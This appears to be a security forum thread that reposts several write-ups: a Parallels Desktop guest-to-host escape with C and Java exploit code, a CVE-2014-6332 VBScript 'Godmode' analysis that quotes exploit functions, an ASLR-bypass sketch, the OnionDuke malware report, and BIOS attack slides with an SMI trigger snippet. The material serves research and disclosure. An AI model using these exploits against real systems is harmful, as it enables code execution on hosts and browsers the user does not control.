There is an "Access Windows folder from Mac" option that looks pretty innocent (please note that all other sharing options are off). This option is enabled by default for all virtual machines as well, and here is the description of this option from the Parallels Desktop 10 for Mac User's Guide:

Access a Windows Folder or File from a Mac OS X Application

By default, you can navigate to all your Windows folders and files from Mac OS X. Windows disks are mounted to /Volumes. At the same time, Windows appears as a hard disk mounted on the Mac OS X desktop.

Note: The Windows disk disappears from the desktop and the Finder, but you can still access all of the Windows files and folders via the Windows PVM file and Terminal (/Volumes). By default, the PVM file is either in /Users/<Username>/Documents/Parallels/ or /Users/Shared. You can also find the PVM file by right-clicking Windows in Parallels Desktop Control Center (or in the virtual machine window when Windows is shut down) and selecting Show in Finder. To access Windows files and folders, right-click the PVM file, select Show Package Contents from the context menu, and open the Windows Disks folder. To disable the ability to navigate to Windows files and folders, deselect Access Windows folders from Mac in step 3 above.

Well, it's just guest file system sharing, you'll say, what could possibly go wrong? Unfortunately, a lot. After enabling this option you can also notice a very interesting "Open on Mac" item in the Windows Explorer context menu:

Looks promising, right? Technically, this option asks the piece of Parallels software working on the host side to do the equivalent of double-clicking on the target file in Finder. The guest-side part of this option is implemented as the PrlToolsShellExt.dll shell extension (the MD5 sum of the DLL with version 10.1.1.28614 on my Windows 8.1 x64 guest is 97D15FB584C589FA297434E08CD0252F).
The menu item click handler is located in function sub_180005834(); after some pre-processing of the input values it sends an IOCTL request to the device \Device\prl_tg, which belongs to one of the Parallels kernel-mode drivers (prl_tg.sys):

After a breakpoint on this DeviceIoControl() call we can obtain a call stack backtrace and the function arguments:

0:037> k L7
Child-SP          RetAddr           Call Site
00000000`12bcd1c0 00007ff9`2a016969 PrlToolsShellExt!DllUnregisterServer+0x1596
00000000`12bcd310 00007ff9`2a01fd71 SHELL32!Ordinal93+0x225
00000000`12bcd410 00007ff9`2a4cf03a SHELL32!SHCreateDefaultContextMenu+0x581
00000000`12bcd780 00007ff9`2a4cc4b1 SHELL32!Ordinal927+0x156c2
00000000`12bcdaf0 00007ff9`2a4c76f7 SHELL32!Ordinal927+0x12b39
00000000`12bcded0 00007ff9`21d09944 SHELL32!Ordinal927+0xdd7f
00000000`12bcdf20 00007ff9`21d059d3 explorerframe!UIItemsView::ShowContextMenu+0x298

The first 4 arguments of DeviceIoControl() are passed in registers: rcx is the device handle, r8 the input buffer, r9 the buffer length:

0:037> r
rax=0000000012bcd240 rbx=0000000000000000 rcx=0000000000000d74
rdx=000000000022a004 rsi=0000000000000001 rdi=0000000000000070
rip=00007ff918bd5b92 rsp=0000000012bcd1c0 rbp=000000000022a004
 r8=0000000012bcd240  r9=0000000000000070 r10=000000001a5bc990
r11=000000001a5bd110 r12=0000000000000002 r13=0000000012bcd490
r14=0000000012bcd4a0 r15=0000000016af90f0

The last 4 arguments of DeviceIoControl() were passed on the stack:

0:037> dq rsp L4
00000000`12bcd1c0 00000000`00000000 00000000`02bdc218
00000000`12bcd1d0 00000000`00000001 00000000`00ce2480

The IOCTL request input buffer:

0:037> dq @r8
00000000`12bcd240 ffffffff`00008321 00000000`00010050
00000000`12bcd250 00000000`00000001 00000000`00000002
00000000`12bcd260 00000000`00000002 00000000`00000000
00000000`12bcd270 00000000`00000000 00000000`00000000
00000000`12bcd280 00000000`00000000 00000000`00000000
00000000`12bcd290 00000000`00000000 00000000`00000000
00000000`12bcd2a0 00000000`02c787d0 00000000`0000003c

It consists of several magic values and a pointer to an ASCII string with the target file path at offset 0x60:

0:037> da poi(@r8+60)
00000000`02c787d0 "\\psf\TC\dev\_exploits\prl_guet_"
00000000`02c787f0 "to_host\New Text Document.txt"

After sending this IOCTL request to the driver, the specified file will be opened on the host side. It is also interesting (and useful) that this action can be triggered from a Windows user account with any privilege level (including Guest):

\Device\prl_tg security permissions

And because the target file is opened on the host side with the privileges of the current OS X user, the "Access Windows folder from Mac" option definitely breaks the security model that you usually expect from guest-host interaction.

Exploiting

The following function was implemented after briefly reverse engineering the shell extension. It interacts with the Parallels kernel driver and opens the specified file on the host side:

void OpenFileAtTheHostSide(char *lpszFilePath)
{
    HANDLE hDev = NULL;

    // get handle to the target device
    if (OpenDevice(L"\\Device\\prl_tg", &hDev))
    {
        PDWORD64 RequestData = (PDWORD64)LocalAlloc(LMEM_FIXED, 0x70);
        if (RequestData)
        {
            IO_STATUS_BLOCK StatusBlock;

            ZeroMemory(RequestData, 0x70);

            /* Fill IOCTL request input buffer.
               It has the same layout on x86 and x64 versions of Windows */
            RequestData[0x0] = 0xffffffff00008321; // magic values
            RequestData[0x1] = 0x0000000000010050;
            RequestData[0x2] = 0x0000000000000001;
            RequestData[0x3] = 0x0000000000000002;
            RequestData[0x4] = 0x0000000000000002;

            RequestData[0xc] = (DWORD64)lpszFilePath; // file path and its length
            RequestData[0xd] = (DWORD64)strlen(lpszFilePath) + 1;

            NTSTATUS ns = NtDeviceIoControlFile(
                hDev, NULL, NULL, NULL, &StatusBlock,
                0x22a004, // IOCTL code
                RequestData, 0x70,
                RequestData, 0x70
            );

            DbgMsg(__FILE__, __LINE__, "Device I/O control request status is 0x%.8x\n", ns);

            // ...

            M_FREE(RequestData);
        }

        CloseHandle(hDev);
    }
}

Now let's write some payload. Unfortunately, we can't execute a shell script or AppleScript file in this way, because such files will be opened in a text editor. But there are still a lot of other evil things an attacker can do with the ability to open arbitrary files. For example, it's possible to write a Java .class that executes a specified command and saves its output to the guest file system (which is usually mounted at /Volumes/<windows_letter>):

public static void main(String[] args)
{
    // execute command and get its output
    StringBuilder output = new StringBuilder();
    if (exec(defaultCmd, output) == -1)
    {
        output.append("Error while executing command");
    }

    String volumesPath = "/Volumes";
    File folder = new File(volumesPath);

    // enumerate mounted volumes of Parallels guests
    for (File file : folder.listFiles())
    {
        if (file.isDirectory())
        {
            // try to save command output into the temp
            String outFile = volumesPath + "/" + file.getName() + "/Windows/Temp/prl_host_out.txt";
            try
            {
                write(outFile, output.toString());
            }
            catch (IOException e)
            {
                continue;
            }
        }
    }
}

Using this .class and the OpenFileAtTheHostSide() function, we can implement a usable command execution exploit:

Execution of commands using the PoC

The full exploit code is available at GitHub: https://github.com/Cr4sh/prl_guest_to_host

Protection from this attack is pretty simple: disabling the "Access Windows folder from Mac" option in the virtual machine settings prevents files from being opened from the guest system. Also, you can enable the "Isolate Windows from Mac" option, which (in theory) disables all of the virtual machine's sharing features:

TL;DR

This is arguably more of an incomplete-documentation issue than a vulnerability: it's absolutely not obvious to the user that guest file system sharing can lead to arbitrary code execution on the host side. The exploit is very simple and reliable, it works with all versions of Windows in guest machines, and the attack can be performed with the privileges of any Windows user that belongs to the Everyone security group. This issue is also relevant to other guest operating systems (like Linux and OS X); however, the provided PoC was designed only for Windows. It would be wise to disable the sharing options of virtual machines if such an attack vector might be critical for your threat model.

I think it's very unlikely that Parallels will release any significant fixes or improvements for the described mechanisms, because any reasonable fix would break the easy way of opening Windows documents on the Mac. I played a bit with only one sharing option, but who knows how many similar (or even worse) security issues actually exist in Parallels, VMware and Oracle products.

PS: Have good fun at ZeroNights; too bad I'm missing it this year.
Posted by Cr4sh

Sursa: My aimful life: Simple guest to host VM escape for Parallels Desktop
  20. RST T-shirt

    So, opinions, suggestions? Who else wants one?
  21. So, what stage is the project at?
  22. Bypassing Address Space Layout Randomization

Toby ’TheXero’ Reynolds
April 15, 2012

Contents:
Introduction
Method 1 - Partial overwrite
Method 2 - Non ASLR
Method 3 - Brute force
Conclusion

Download: http://nullsecurity.net/papers/nullsec-bypass-aslr.pdf
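The paper explains each method in detail; as a taste of Method 1, here is a minimal, purely illustrative C sketch of the core idea behind a partial overwrite (all values are hypothetical). ASLR randomizes a module's base address, but the low 12 bits of any address (the page offset) are never randomized, so corrupting only the low byte of a saved code pointer can redirect execution within the same page without knowing the base:

#include <stdio.h>
#include <stdint.h>
#include <string.h>

int main(void)
{
    // pretend this is a saved return address into a randomized module
    uint64_t saved_ret = 0x7f3a12345678ULL;  // hypothetical value
    uint8_t evil_low = 0x10;                 // attacker-chosen byte

    // a partial overwrite corrupts only the low byte (little-endian),
    // leaving the randomized high bits untouched
    memcpy(&saved_ret, &evil_low, 1);

    printf("redirected to: 0x%llx\n", (unsigned long long)saved_ret);  // 0x7f3a12345610
    return 0;
}

Overwriting two low bytes works the same way but gambles on the 4 randomized bits above the page offset, which is where the brute-force flavour of these attacks comes in.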
  23. A Killer Combo: Critical Vulnerability and ‘Godmode’ Exploitation on CVE-2014-6332

by Weimin Wu (Threat Analyst)

Microsoft released 16 security updates during its Patch Tuesday release for November 2014, among them CVE-2014-6332, the Windows OLE Automation Array Remote Code Execution Vulnerability (covered in MS14-064). We would like to bring attention to this particular vulnerability for the following reasons:

It impacts almost all Microsoft Windows versions from Windows 95 onward.
A stable exploit exists and works in versions of Internet Explorer from 3 to 11, and can bypass operating system (OS) security utilities and protection such as Enhanced Mitigation Experience Toolkit (EMET), Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control-Flow Integrity (CFI).
Proof of concept (PoC) exploit code has recently been published by a Chinese researcher named Yuange1975.
Based on the PoC, it's fairly simple to write malicious VBScript code for attacks. Attackers may soon utilize the PoC to target unpatched systems.

About the CVE-2014-6332 Vulnerability

The bug is caused by improper handling of array resizing in the Internet Explorer VBScript engine. VBScript is the default scripting language in ASP (Active Server Pages). Other browsers like Google Chrome do not support VBScript, but Internet Explorer still supports it via a legacy engine to ensure backward compatibility.

An array has the following structure in the VBScript engine:

typedef struct tagSAFEARRAY {
    USHORT cDims;
    USHORT fFeatures;
    ULONG cbElements;
    ULONG cLocks;
    PVOID pvData;
    SAFEARRAYBOUND rgsabound[1];
} SAFEARRAY;

typedef struct tagSAFEARRAYBOUND {
    ULONG cElements;
    LONG lLbound;
} SAFEARRAYBOUND;

pvData is a pointer to the array's data, and rgsabound[0].cElements holds the number of elements in the array. Each element is a Var structure, whose size is 0x10:

Var {
    0x00: varType
    0x04: padding
    0x08: dataHigh
    0x0c: dataLow
}

A bug may occur when redefining an array with a new length in VBScript, such as:

redim aa(a0)
…
redim Preserve aa(a1)

The VBScript engine will call the function OLEAUT32!SafeArrayRedim(), whose arguments are:

First: ppsaOUT      // the SafeArray address
Second: psaboundNew // the address of a SAFEARRAYBOUND, which contains the new
                    // number of elements: arg_newElementsSize

Figure 1. Code of function SafeArrayRedim()

The function SafeArrayRedim() performs the following steps:

Get the size of the old array: oldSize = old cElements * 0x10 (cbElements, the size of each element, is 0x10)
Set the new element count in the array: arg_pSafeArray->rgsabound[0].cElements = arg_newElementsSize
Get the size of the new array: newSize = arg_newElementsSize * 0x10
Get the difference: sub = newSize - oldSize
If sub > 0, goto bigger_alloc (this branch has no problem)
If sub < 0, goto less_alloc to reallocate memory via function ole32!CRetailMalloc_Realloc()

In our case execution takes the second branch: though sub is a huge positive value as an unsigned integer, it is treated as a negative value here because the jge opcode works on signed integers. Here is the problem, an integer overflow (signed/unsigned confusion):

cElements is used as an unsigned integer
oldSize, newSize and sub are computed as unsigned integers
sub is treated as a signed integer in the jge comparison

(A standalone C illustration of this confusion appears a little further below.)

The Dangerous PoC Exploit

This critical vulnerability can be triggered in a simple way. For the VBScript engine, there is a magic exploitation method called "Godmode". With "Godmode," arbitrary code written in VBScript can break the browser sandbox. Attackers do not need to write shellcode and ROP; DEP and ASLR protection is naturally useless here.
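Stepping back to the integer overflow for a moment: to see the signed/unsigned confusion in isolation, here is a minimal standalone C sketch. The element counts are hypothetical, mirroring the PoC's a0 and a0+&h8000000, and this is a recreation of the arithmetic rather than the engine's actual code:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    // hypothetical counts mirroring the PoC: a2 = a0 + &h8000000
    uint32_t oldElements = 0x100;
    uint32_t newElements = 0x100 + 0x8000000;

    uint32_t oldSize = oldElements * 0x10;  // each Var is 0x10 bytes
    uint32_t newSize = newElements * 0x10;  // 0x80001000
    uint32_t sub     = newSize - oldSize;   // 0x80000000: huge as unsigned

    // SafeArrayRedim() branches with jge, a *signed* comparison, so the
    // set high bit makes sub look negative...
    if ((int32_t)sub < 0)
        printf("shrink path taken: buffer reallocated smaller\n");
    else
        printf("grow path taken\n");

    // ...yet rgsabound[0].cElements was already set to the huge new count,
    // so elements far beyond the real buffer become addressable from script
    return 0;
}

The size check takes the shrink path while cElements already advertises the huge new length, which is exactly what leaves out-of-bounds Vars reachable from VBScript. With that mechanism clear, back to the PoC.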
Because we can do almost everything with VBScript in "Godmode," a file infector payload is not necessary in this situation. This makes it easy to evade detections aimed at heap sprays, Return Oriented Programming (ROP), shellcode, or a file infector payload. Next, we'll see how reliable the existing PoC is.

Exploiting the vulnerability

First, the exploit PoC performs type confusion using this vulnerability. It defines two arrays, aa and ab, and then resizes aa with a huge number:

a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)

Because arrays aa and ab have the same type and the same number of elements, it's possible to get the following array memory layout:

Figure 2. Expected memory layout of arrays aa, ab

When redim Preserve aa(a2) (with a2 = a0+&h8000000) is run, it may trigger the vulnerability. If that happens, the out-of-bounds elements of aa become accessible, and the PoC uses this to do type confusion on an element of ab. But the memory layout does not always meet the expectation, and the bug may not be triggered every time. So the PoC tries many times until the following conditions are met:

The address of ab(b0) is a pointer to the type field (naturally, b0=0 here)
The address of aa(a0) is a pointer to the data high field of ab(b0)

Which means: address(aa(a0)) is equal to address(ab(b0)) + 8

Figure 3. Memory layout when the conditions are met

Then, modifying the data high field of ab(b0) is equivalent to modifying the type field of aa(a0): type confusion.

Second, the PoC uses the type confusion to make any memory readable:

Function readmem(add)
    On Error Resume Next
    ab(b0)=0                      ' type of aa(a0) is changed to int
    aa(a0)=add+4                  ' the data high field of aa(a0) is set to add+4
    ab(b0)=1.69759663316747E-313  ' this is 0x0000000800000008
                                  ' now the type of aa(a0) is changed to bstr
    readmem=lenb(aa(a0))          ' the length of a bstr is stored at pBstrBase-4
                                  ' lenb(aa(a0)) = [pBstrBase-4] = [add+4-4]
    ab(b0)=0
End Function

The above function can read the memory at any address [add], which is used to enter "Godmode."

Enter "Godmode"

We know that VBScript can be used in browsers or in the local shell. When used in the browser, its behavior is restricted, but the restriction is controlled by some flags. That means that if the flags are modified, VBScript in HTML can do everything it can do in the local shell. That way, attackers can easily write malicious code in VBScript; this is known as "Godmode."

The following function in the PoC exploit is used to enter "Godmode". The said flags exist in the COleScript object. If the address of COleScript is retrieved, the flags can be modified:

function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)    ' get address of CScriptEntryPoint, which includes a pointer to COleScript
    i=readmemo(i+16)   ' get address of COleScript, which includes the said safemode flags
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4   ' for compatibility with different IE versions
        j=readmemo(i+&h120+k)
        if(j=14) then
            j=0
            redim Preserve aa(a2)
            aa(a1+2)(i+&h11c+k)=ab(4)   ' change safemode flags
            redim Preserve aa(a0)
            j=0
            j=readmemo(i+&h120+k)
            Exit for
        end if
    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

Here, the function mydata() returns a variable holding a function object, which includes a pointer to CScriptEntryPoint. This raises a question: if the address of a function object is not accessible using VBScript, how does the PoC obtain it?
The following function shows a smart trick used in this PoC:

function mydata()
    On Error Resume Next
    i=testaa
    i=null
    redim Preserve aa(a2)
    ab(0)=0
    aa(a1)=i
    ab(0)=6.36598737437801E-314
    aa(a1+2)=myarray
    ab(2)=1.74088534731324E-310
    mydata=aa(a1)
    redim Preserve aa(a0)
end function

The key is in the first three lines of the function:

i=testaa

We know that we cannot get the address of a function object in VBScript, so this code seems to be nonsense. However, let's look at the stack when executing it. Before the above line, the stack is empty. First, the VM resolves testaa as a function and pushes its address onto the stack. Second, the VM resolves the address of i and attempts the assignment. However, the VM finds that the type of the value on the stack is a function object, so it returns an error and enters error handling. Because "On Error Resume Next" is set in the function mydata(), the VM continues with the next statement even though the error occurred.

i=null

For this line, the VM evaluates "null" first. For "null", the VM does not push new data onto the stack; instead, it only changes the type of the last item on the stack to 0x1!! The VM then assigns it to i; the value is still the address of the function testaa(), though the type of i is VT_NULL. These lines are used to leak the address of the function testaa() via a VT_NULL-typed variable.

Conclusion

The "Godmode" of the legacy VBScript engine is the most dangerous risk in Internet Explorer. If a suitable vulnerability is found, attackers can develop stable exploits with little effort; CVE-2014-6332 is just one of the vulnerabilities that lends itself most easily to this. Fortunately, Microsoft has released a patch for that particular CVE, but we still expect Microsoft to provide a direct fix for "Godmode," in the same way Chrome abandoned support for VBScript.

In addition, this vulnerability is fairly simple to exploit, bypassing all protections on the way into VBScript "Godmode," which in turn can make the attacker a 'super user' with full control of the system. Attackers do not necessarily need shellcode to compromise their targets. The scope of affected Windows versions is very broad, with many affected versions (such as Windows 95 and Windows XP) no longer supported. This raises the risk for these older OSes in particular, as they will remain vulnerable to exploits.

This vulnerability is very rare in that it affects almost all OS versions, while at the same time the exploit is advanced enough to bypass all Microsoft protections, including DEP, ASLR, EMET, and CFI. With this killer combination of an advanced exploitation technique and a wide array of affected platforms, there's a high possibility that attackers will leverage this in future attacks.

Solutions and Recommendations

We highly recommend that users implement the following best practices:

Install Microsoft patches immediately. Using any browser other than Internet Explorer before patching may also mitigate the risks.
We also advise users to employ newer versions of Windows platforms that are supported by Microsoft.

Trend Micro™ Deep Security and Vulnerability Protection, part of our Smart Protection Suites, are our recommended solutions for enterprises to defend their systems against these types of attacks.
Trend Micro Deep Security and OfficeScan with the Intrusion Defense Firewall (IDF) plugin protect user systems from threats that may leverage this vulnerability via the following DPI rules:

1006324 – Windows OLE Automation Array Remote Code Execution Vulnerability (CVE-2014-6332)
1006290 – Microsoft Windows OLE Remote Code Execution Vulnerability
1006291 – Microsoft Windows OLE Remote Code Execution Vulnerability -1

For more information on the support for all vulnerabilities disclosed in this month's Patch Tuesday, go to our Threat Encyclopedia page.

Sursa: A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332
  24. OnionDuke: APT Attacks Via the Tor Network

Recently, research was published identifying a Tor exit node, located in Russia, that was consistently and maliciously modifying any uncompressed Windows executables downloaded through it. Naturally this piqued our interest, so we decided to peer down the rabbit hole. Suffice it to say, the hole was a lot deeper than we expected! In fact, it went all the way back to the notorious Russian APT family MiniDuke, known to have been used in targeted attacks against NATO and European government agencies. The malware used in this case is, however, not a version of MiniDuke. It is instead a separate, distinct family of malware that we have since taken to calling OnionDuke. But let's start from the beginning.

When a user attempts to download an executable via the malicious Tor exit node, what they actually receive is an executable "wrapper" that embeds both the original executable and a second, malicious executable. By using a separate wrapper, the malicious actors are able to bypass any integrity checks the original binary might contain. Upon execution, the wrapper will proceed to write to disk and execute the original executable, thereby tricking the user into believing that everything went fine. However, the wrapper will also write to disk and execute the second executable. In all the cases we have observed, this malicious executable has been the same binary (SHA1: a75995f94854dea8799650a2f4a97980b71199d2, detected as Trojan-Dropper:W32/OnionDuke.A). This executable is a dropper containing a PE resource that pretends to be an embedded GIF image file. In reality, the resource is actually an encrypted dynamically linked library (DLL) file. The dropper will proceed to decrypt this DLL, write it to disk and execute it.

A flowchart of the infection process

Once executed, the DLL file (SHA1: b491c14d8cfb48636f6095b7b16555e9a575d57f, detected as Backdoor:W32/OnionDuke.B) will decrypt an embedded configuration (shown below) and attempt to connect to hardcoded C&C URLs specified in the configuration data. From these C&Cs the malware may receive instructions to download and execute additional malicious components. It should be noted that we believe all five domains contacted by the malware are innocent websites compromised by the malware operators, not dedicated malicious servers.

A screenshot of the embedded configuration data

Through our research, we have also been able to identify multiple other components of the OnionDuke malware family. We have, for instance, observed components dedicated to stealing login credentials from the victim machine and components dedicated to gathering further information on the compromised system, like the presence of antivirus software or a firewall. Some of these components have been observed being downloaded and executed by the original backdoor process, but for other components we have yet to identify the infection vector. Most of these components don't embed their own C&C information but rather communicate with their controllers through the original backdoor process.

One component, however, is an interesting exception. This DLL file (SHA1: d433f281cf56015941a1c2cb87066ca62ea1db37, detected as Backdoor:W32/OnionDuke.A) contains among its configuration data a different hardcoded C&C domain, overpict.com, and also evidence suggesting that this component may abuse Twitter as an additional C&C channel. What makes the overpict.com domain interesting is that it was originally registered in 2011 under the alias "John Kasai".
Within a two-week window, "John Kasai" also registered the following domains: airtravelabroad.com, beijingnewsblog.net, grouptumbler.com, leveldelta.com, nasdaqblog.net, natureinhome.com, nestedmail.com, nostressjob.com, nytunion.com, oilnewsblog.com, sixsquare.net and ustradecomp.com. This is significant because the domains leveldelta.com and grouptumbler.com have previously been identified as C&C domains used by MiniDuke. This strongly suggests that although OnionDuke and MiniDuke are two separate families of malware, the actors behind them are connected through the use of shared infrastructure.

A visualization of the infrastructure shared between OnionDuke and MiniDuke

Based on compilation timestamps and discovery dates of samples we have observed, we believe the OnionDuke operators have been infecting downloaded executables at least since the end of October 2013. We also have evidence suggesting that, at least since February of 2014, OnionDuke has not only been spread by modifying downloaded executables but also by infecting executables in .torrent files containing pirated software. However, it would seem that the OnionDuke family is much older, based both on older compilation timestamps and on the fact that some of the embedded configuration data makes reference to an apparent version number of 4, suggesting that at least three earlier versions of the family exist.

During our research, we have also uncovered strong evidence suggesting that OnionDuke has been used in targeted attacks against European government agencies, although we have so far been unable to identify the infection vector(s). Interestingly, this would suggest two very different targeting strategies. On one hand is the "shooting a fly with a cannon" mass-infection strategy through modified binaries and, on the other, the more surgical targeting traditionally associated with APT operations.

In any case, although much is still shrouded in mystery and speculation, one thing is certain. While using Tor may help you stay anonymous, it does at the same time paint a huge target on your back. It's never a good idea to download binaries via Tor (or anything else) without encryption. The problem with Tor is that you have no idea who is maintaining the exit node you are using and what their motives are. VPNs (such as our Freedome VPN) will encrypt your connection all the way through the Tor network, so the maintainers of Tor exit nodes will not see your traffic and can't tamper with it.

Samples:
• a75995f94854dea8799650a2f4a97980b71199d2
• b491c14d8cfb48636f6095b7b16555e9a575d57f
• d433f281cf56015941a1c2cb87066ca62ea1db37

Detected as: Trojan-Dropper:W32/OnionDuke.A, Backdoor:W32/OnionDuke.A, and Backdoor:W32/OnionDuke.B.

Post by — Artturi (@lehtior2)

Sursa: OnionDuke: APT Attacks Via the Tor Network - F-Secure Weblog : News from the Lab
  25. BIOS and Secure Boot Attacks Uncovered

Andrew Furtak, Yuriy Bulygin, Oleksandr Bazhaniuk, John Loucaides, Alexander Matrosov, Mikhail Gorobets

Signed BIOS Updates Are Rare

Mebromi malware includes BIOS infector & MBR bootkit components
• Patches the BIOS ROM binary, injecting a malicious ISA Option ROM, using a legitimate BIOS image mod utility
• Triggers SW SMI 0x29/0x2F to erase the SPI flash, then writes the patched BIOS binary

No Signature Checks of OS Boot Loaders (MBR)
• No concept of Secure or Verified Boot
• Wonder why TDL4 and the like flourished?

Slides: http://www.c7zero.info/stuff/BIOSandSecureBootAttacksUncovered_eko10.pdf
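For context on the "Triggers SW SMI 0x29/0x2F" bullet: software SMIs are conventionally raised by writing a command byte to the x86 APM command port, 0xB2. The sketch below is a minimal, hypothetical illustration for Linux user space (assumes x86, root privileges, and glibc's sys/io.h); the 0x29/0x2F values are the ones the slides attribute to the targeted BIOS, and whether any handler reacts to them is entirely platform-specific:

#include <stdio.h>
#include <stdlib.h>
#include <sys/io.h>   /* ioperm(), outb(): x86 Linux only */

int main(void)
{
    /* request access to I/O port 0xB2 (the APM command port); needs root */
    if (ioperm(0xb2, 1, 1) != 0) {
        perror("ioperm");
        return EXIT_FAILURE;
    }

    /* writing a command byte here raises a software SMI; what the SMI
       handler does with command 0x29 depends entirely on the firmware */
    outb(0x29, 0xb2);
    return EXIT_SUCCESS;
}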